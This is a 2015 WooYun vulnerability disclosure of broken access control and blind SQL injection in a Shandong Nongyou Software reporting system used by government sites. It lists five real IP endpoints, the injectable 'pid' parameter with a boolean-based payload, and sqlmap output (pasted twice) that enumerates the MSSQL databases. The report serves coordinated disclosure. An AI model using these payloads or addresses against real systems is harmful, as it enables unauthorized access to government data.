当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089547

漏洞标题:某政府系统一处越权+一处SQL注入

相关厂商:山东农友软件

漏洞作者: 路人甲

提交时间:2015-01-06 11:43

修复时间:2015-04-06 11:44

公开时间:2015-04-06 11:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-06: 细节已通知厂商并且等待厂商处理中
2015-01-11: 厂商已经确认,细节仅向厂商公开
2015-01-14: 细节向第三方安全合作伙伴开放
2015-03-07: 细节向核心白帽子及相关领域专家公开
2015-03-17: 细节向普通白帽子公开
2015-03-27: 细节向实习白帽子公开
2015-04-06: 细节向公众公开

简要描述:

RT

详细说明:

山东农友软件公司官网:http://www.nongyou.com.cn/
越权案例如下:
http://221.2.149.47:8100/jubao/left.aspx
http://222.135.109.70:8100/jubao/left.aspx
http://123.134.189.60:8012/jubao/left.aspx
http://218.56.40.229:8020/jubao/left.aspx
http://222.135.127.190:7000/jubao/left.aspx

1.png


2.一处越权注入:
http://222.135.127.190:7000/jubao/StatisticalAnalysisChart.aspx?pid=
http://221.2.149.47:8100/jubao/StatisticalAnalysisChart.aspx?pid=
http://222.135.109.70:8100/jubao/StatisticalAnalysisChart.aspx?pid=
http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=
http://218.56.40.229:8020/jubao/StatisticalAnalysisChart.aspx?pid=
2.测试注入点:http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=

2.png


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz
---
[18:13:11] [INFO] testing MySQL
[18:13:11] [WARNING] the back-end DBMS is not MySQL
[18:13:11] [INFO] testing Oracle
sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you
want to follow? [Y/n] n
[18:13:12] [WARNING] the back-end DBMS is not Oracle
[18:13:12] [INFO] testing PostgreSQL
[18:13:12] [WARNING] the back-end DBMS is not PostgreSQL
[18:13:12] [INFO] testing Microsoft SQL Server
[18:13:12] [WARNING] reflective value(s) found and filtering out
[18:13:12] [INFO] confirming Microsoft SQL Server
[18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[18:13:13] [INFO] fetching database names
[18:13:13] [INFO] fetching number of databases
[18:13:13] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[18:13:13] [INFO] retrieved: 12
[18:13:14] [INFO] retrieved: gangchengnl
[18:13:22] [INFO] retrieved: gaoxinqunl
[18:13:31] [INFO] retrieved: kaifaqunl
[18:13:41] [INFO] retrieved: laichengnl
[18:13:51] [INFO] retrieved: laiwunl
[18:13:58] [INFO] retrieved: master
[18:14:03] [INFO] retrieved: model
[18:14:08] [INFO] retrieved: msdb
[18:14:11] [INFO] retrieved: ReportServer
[18:14:21] [INFO] retrieved: ReportServerTempDB
[18:14:36] [INFO] retrieved: tempdb
[18:14:41] [INFO] retrieved: xueyenl
available databases [12]:
[*] gangchengnl
[*] gaoxinqunl
[*] kaifaqunl
[*] laichengnl
[*] laiwunl
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xueyenl
[18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\123.134.189.60'


均可复现。

漏洞证明:

2.测试注入点:http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=

2.png


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz
---
[18:13:11] [INFO] testing MySQL
[18:13:11] [WARNING] the back-end DBMS is not MySQL
[18:13:11] [INFO] testing Oracle
sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you
want to follow? [Y/n] n
[18:13:12] [WARNING] the back-end DBMS is not Oracle
[18:13:12] [INFO] testing PostgreSQL
[18:13:12] [WARNING] the back-end DBMS is not PostgreSQL
[18:13:12] [INFO] testing Microsoft SQL Server
[18:13:12] [WARNING] reflective value(s) found and filtering out
[18:13:12] [INFO] confirming Microsoft SQL Server
[18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[18:13:13] [INFO] fetching database names
[18:13:13] [INFO] fetching number of databases
[18:13:13] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[18:13:13] [INFO] retrieved: 12
[18:13:14] [INFO] retrieved: gangchengnl
[18:13:22] [INFO] retrieved: gaoxinqunl
[18:13:31] [INFO] retrieved: kaifaqunl
[18:13:41] [INFO] retrieved: laichengnl
[18:13:51] [INFO] retrieved: laiwunl
[18:13:58] [INFO] retrieved: master
[18:14:03] [INFO] retrieved: model
[18:14:08] [INFO] retrieved: msdb
[18:14:11] [INFO] retrieved: ReportServer
[18:14:21] [INFO] retrieved: ReportServerTempDB
[18:14:36] [INFO] retrieved: tempdb
[18:14:41] [INFO] retrieved: xueyenl
available databases [12]:
[*] gangchengnl
[*] gaoxinqunl
[*] kaifaqunl
[*] laichengnl
[*] laiwunl
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xueyenl
[18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\123.134.189.60'


1.png

修复方案:

合理分配权限,参数过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-01-11 10:31

厂商回复:

最新状态:

暂无